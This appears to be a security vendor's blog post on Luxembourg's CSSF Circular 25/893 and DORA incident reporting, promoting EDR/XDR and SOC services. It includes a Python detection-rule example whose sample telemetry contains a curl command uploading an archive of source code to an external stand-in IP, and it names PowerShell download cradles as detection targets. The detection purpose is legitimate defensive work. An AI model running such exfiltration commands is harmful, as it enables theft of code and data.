
CSSF — Circular 25/893: tightened ICT alerting and reporting under DORA

The CSSF tightens ICT incident classification and notification under DORA via eDesk. Here is how an EDR/XDR stack enables timely detection, qualification, and reporting with harmonized deadlines.

On 17 March 2026, the CSSF reiterated the DORA information register collection and the entry into application of Circular 25/893 on the classification and notification of ICT incidents and significant cyber threats. Below, we set out what the circular requires and where an EDR/XDR stack supplies the detection, qualification and evidence needed to notify within the harmonized deadlines.

Key facts

On 17 March 2026, the CSSF updated the DORA “information register collection” and restated the obligation to notify ICT incidents via its eDesk portal, following CSSF Circular 25/893 that entered into force at end‑2025. The circular requires DORA‑covered financial entities to classify and notify major ICT‑related incidents and, on a voluntary basis, significant cyber threats, using forms and deadlines harmonized by European technical standards (ITS/RTS). Payment service providers not covered by DORA are explicitly subject to aligned classification and notification requirements. The CSSF also clarifies the practical setup (role “DORA Reporting”, submissions via eDesk, regular updates of the ICT dependencies register) and tightens operational expectations around detection and incident escalation.

CSSF sources: update “DORA – Information register collection” dated 17/03/2026 (cssf.lu) and CSSF Circular 25/893 (PDF) (cssf.lu), complemented by the eDesk opening notice of 11/02/2026 (cssf.lu).

Why this matters now: attacks keep accelerating. In May 2026, GitHub confirmed roughly 3,800 internal repositories were compromised via a booby‑trapped VS Code extension — another case of fast‑moving compromise that demands near real‑time detection and notification. (BleepingComputer)

The applicable legal framework

Regulation (EU) 2022/2554 (DORA) governs ICT incident management:

  • Arts. 17–18: management process and classification criteria (major incidents, cyber threats).
  • Art. 19: notification of major incidents and voluntary notification of significant cyber threats (templates and deadlines harmonized by ITS/RTS). See EUR‑Lex and a concise reminder of Art. 19 (Better Regulation).
  • Arts. 20–21: standardized content and centralized reporting.

CSSF Circular 25/893 tightens operationalization in Luxembourg: it details classification and reporting for DORA entities and aligns requirements for certain non‑DORA PSPs (notification framework, eDesk channels, scope and definitions). It also reiterates the link with the information register (Art. 28 DORA) collected via eDesk, with the 2026 window formalized by the CSSF. For a practical reminder of the DORA framework from Luxgap, see key DORA concepts. References: Circular 25/893 (PDF), eDesk notice 11/02/2026, and thematic page “ICT and cyber risk – DORA entities” (cssf.lu).

The technical solution to deploy

EDR (endpoint detection and response) and XDR (extended detection and response, which correlates endpoint telemetry with network, identity, cloud and SaaS signals) form the enabling block that makes CSSF/DORA incident reporting practicable:

  • What it achieves: early identification of abnormal behaviors (exfiltration, malicious execution, lateral movement), automatic containment (network isolation, executable blocking), and preservation of forensic artifacts to classify the incident and document the initial/interim/final report.
  • How it works: EDR agents on workstations/servers, sensors on cloud workloads, aggregation of network/identity/SaaS telemetry into a correlated XDR platform. SIEM/SOAR integrations assemble the structured content (timeline, impact indicators, affected scope) that is then submitted through eDesk within the deadlines.
  • Concrete controls:
    • Detection (DORA Art. 10 and ISO/IEC 27001:2022 Annex A.5.28, A.8.16): behavioral rules, detection of exploit behavior and living-off-the-land tooling such as certutil or PowerShell download cradles, tagging of suspected exfiltration.
    • Response and recovery (DORA Art. 11): automatic containment, eradication playbooks, remediation verification.
    • Logging and evidence (ISO 27001 A.5.10, A.8.15; NIST CSF 2.0 DE.AE, RS.AN): trustworthy timestamps, retention, hashing, chain of custody for CSSF reports.
    • Classification/Reporting (DORA Arts. 18–20): dashboards mapped to ITS/RTS thresholds (impacts, downtime, customers affected), export of structured metadata to eDesk.

In practice, a well‑integrated EDR/XDR stack with SIEM and SOAR produces what Circular 25/893 requires in hours rather than days: timeline, impact indicators, scope of affected systems, and corrective actions applied.
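As an added example (not code from the page, the CSSF, or any EDR/XDR product), the following Python snippet shows the kind of behavioral rule the detection bullet above refers to, applied to the developer-compromise scenario discussed later on this page: it pairs an archive creation with an outbound upload to a non-sanctioned destination from the same host within a short window, then turns the matching events into the structured fields a reporting team needs to begin Art. 18 classification (timeline, hosts, users, indicators) and a SHA-256 over the canonicalized evidence so the artifacts can be referenced unchanged in the initial, intermediate and final reports. The event schema, hostnames, IP addresses, allowlist, flag list and ten-minute window are all assumptions made for the example; the telemetry is constructed, not real data.

```python
"""
Added example (not from the CSSF, the DORA texts, or any EDR/XDR vendor):
an "archive then external upload" correlation rule over constructed EDR
process events, producing a structured incident record plus an evidence
hash. Event schema, names, IPs, allowlist and window are assumptions.
"""
import hashlib
import ipaddress
import json
import re
from datetime import datetime, timedelta

# Constructed telemetry (not real data): an IDE process spawns tar and then
# curl on a developer workstation; a benign curl health check follows; a
# server backup archive is created but never uploaded anywhere.
EVENTS = [
    {"ts": "2026-05-04T09:12:03Z", "host": "lux-dev-07", "user": "jdoe",
     "parent": "Code.exe", "image": "tar.exe",
     "cmdline": r"tar -czf C:\Users\jdoe\AppData\Local\Temp\src.tgz C:\repos"},
    {"ts": "2026-05-04T09:12:41Z", "host": "lux-dev-07", "user": "jdoe",
     "parent": "Code.exe", "image": "curl.exe",
     "cmdline": r"curl -s -X POST -F f=@C:\Users\jdoe\AppData\Local\Temp\src.tgz https://203.0.113.45/u"},
    {"ts": "2026-05-04T09:30:00Z", "host": "lux-dev-07", "user": "jdoe",
     "parent": "explorer.exe", "image": "curl.exe",
     "cmdline": "curl -sI https://intranet.example.lu/health"},
    {"ts": "2026-05-04T10:02:10Z", "host": "lux-srv-db1", "user": "svc_backup",
     "parent": "backup", "image": "tar",
     "cmdline": "tar -czf /backup/db.tgz /var/lib/db"},
]

ARCHIVERS = {"tar", "tar.exe", "7z.exe", "zip"}                       # assumption
UPLOADERS = {"curl", "curl.exe", "powershell.exe", "bitsadmin.exe"}   # assumption
UPLOAD_FLAGS = ("-F ", "--data", "-d ", "-T ", "-X POST", "--upload-file", "-Method POST")
WINDOW = timedelta(minutes=10)                                        # assumption
ALLOWED_HOSTS = {"intranet.example.lu", "github.com"}                 # assumed sanctioned destinations
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
URL_RE = re.compile(r"https?://([^/\s:]+)\S*")   # group(0) = full URL, group(1) = host part


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def is_external(dest):
    """True if the URL host is neither an allowed name nor an internal address."""
    try:
        ip = ipaddress.ip_address(dest)
        return not any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        return dest.lower() not in ALLOWED_HOSTS


def is_upload(ev):
    """An upload tool, an external destination, and a flag that sends a body or file."""
    if ev["image"].lower() not in UPLOADERS:
        return False
    m = URL_RE.search(ev["cmdline"])
    return bool(m) and is_external(m.group(1)) and any(f in ev["cmdline"] for f in UPLOAD_FLAGS)


def correlate(events):
    """Pair each archive creation with an external upload from the same host within WINDOW."""
    events = sorted(events, key=lambda e: e["ts"])   # ISO-8601 strings sort chronologically
    findings = []
    for i, a in enumerate(events):
        if a["image"].lower() not in ARCHIVERS:
            continue
        for b in events[i + 1:]:
            if _ts(b["ts"]) - _ts(a["ts"]) > WINDOW:
                break
            if b["host"] == a["host"] and is_upload(b):
                findings.append((a, b))
    return findings


def build_incident(findings):
    """Collapse findings into one structured record plus a reproducible evidence hash."""
    if not findings:
        return None
    # Canonical JSON (sorted keys) so the hash is stable; a set dedupes shared events.
    canon = sorted({json.dumps(e, sort_keys=True) for pair in findings for e in pair})
    evs = sorted((json.loads(c) for c in canon), key=lambda e: e["ts"])
    first, last = _ts(evs[0]["ts"]), _ts(evs[-1]["ts"])
    return {
        "first_seen": evs[0]["ts"],
        "last_seen": evs[-1]["ts"],
        "duration_seconds": int((last - first).total_seconds()),
        "hosts": sorted({e["host"] for e in evs}),
        "users": sorted({e["user"] for e in evs}),
        "indicators": {
            "urls": sorted({URL_RE.search(b["cmdline"]).group(0) for _, b in findings}),
            "processes": sorted({f'{e["parent"]} -> {e["image"]}' for e in evs}),
        },
        "event_count": len(evs),
        "evidence_sha256": hashlib.sha256("\n".join(canon).encode()).hexdigest(),
    }


if __name__ == "__main__":
    print(json.dumps(build_incident(correlate(EVENTS)), indent=2))
```

On the constructed input the rule yields exactly one finding (the IDE-spawned tar followed 38 seconds later by a curl POST to an address outside the internal ranges), while the benign health check (no body flag, allowed host) and the server backup (no upload follows) are ignored. The record is deliberately limited to facts the telemetry supports; whether it crosses the RTS materiality thresholds (affected clients, duration, critical services, data losses) is the classification step that a human still has to make before anything is entered into eDesk.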

How Luxgap delivers this

  • Our 24/7 managed SOC: onboarding of logs and EDR/XDR telemetry, real‑time correlation, proactive hunting, and escalation playbooks aligned to DORA milestones (initial notification, interim and final reports). We prepare eDesk exports and validate classification with your CISO/DPO before submission. Explore our managed SOC approach to EDR/XDR.
  • Our ISO 27001 governance: scoping of logging policies, retention periods, evidence model (hash/timestamp), and documented incident handling procedures — essential to meet CSSF post‑incident requests.
  • Our outsourced DPO and CISO consultants: crisis cell facilitation, DORA Arts. 18/19 qualification, GDPR coherence (Art. 33 to CNPD if personal data is affected), and coordination of multiple notifications (CSSF/CSIRT/CNPD as needed). For leadership, we provide an outsourced CISO alongside your team.

Concrete case in Luxembourg or the EU

Realistic example: a DORA‑regulated management company with multiple ICT providers faces early exfiltration via a compromised IDE extension. The malicious process is caught by an EDR behavioral rule (an unexpected curl invocation from the IDE's process tree shortly after an archive of source files was created). Our SOC isolates the hosts, consolidates the telemetry (process tree, outbound connections), assesses the impact (no critical function downtime, no client data accessed), and qualifies the event. Outcome:

  • Structured initial notification via eDesk within ITS deadlines,
  • Interim report at 24–72h with IOCs/measures,
  • Final report with root‑cause analysis, control hardening, and information register (Art. 28) update

— all driven by solid EDR/XDR evidence retained under ISO 27001.

First concrete steps

  1. Map your DORA‑critical functions to XDR detection use cases (unavailability, degradation, data impact) to accelerate Art. 18 classification.
  2. Enable EDR on 100% of critical assets (workstations, servers, cloud workloads) and validate SIEM/SOAR integrations. Test automatic isolation on a pilot perimeter.
  3. Set up eDesk templates (ITS/RTS) with your CISO/Compliance: who drafts what, by when, and how to extract impact metrics from XDR.
  4. Update the information register (Art. 28) and assign a “DORA Reporting” role holder in the CSSF eDesk with a backup.
  5. Run a table‑top exercise “developer compromise/IDE extension” to rehearse detect > classify > notify > remediate within 48h.
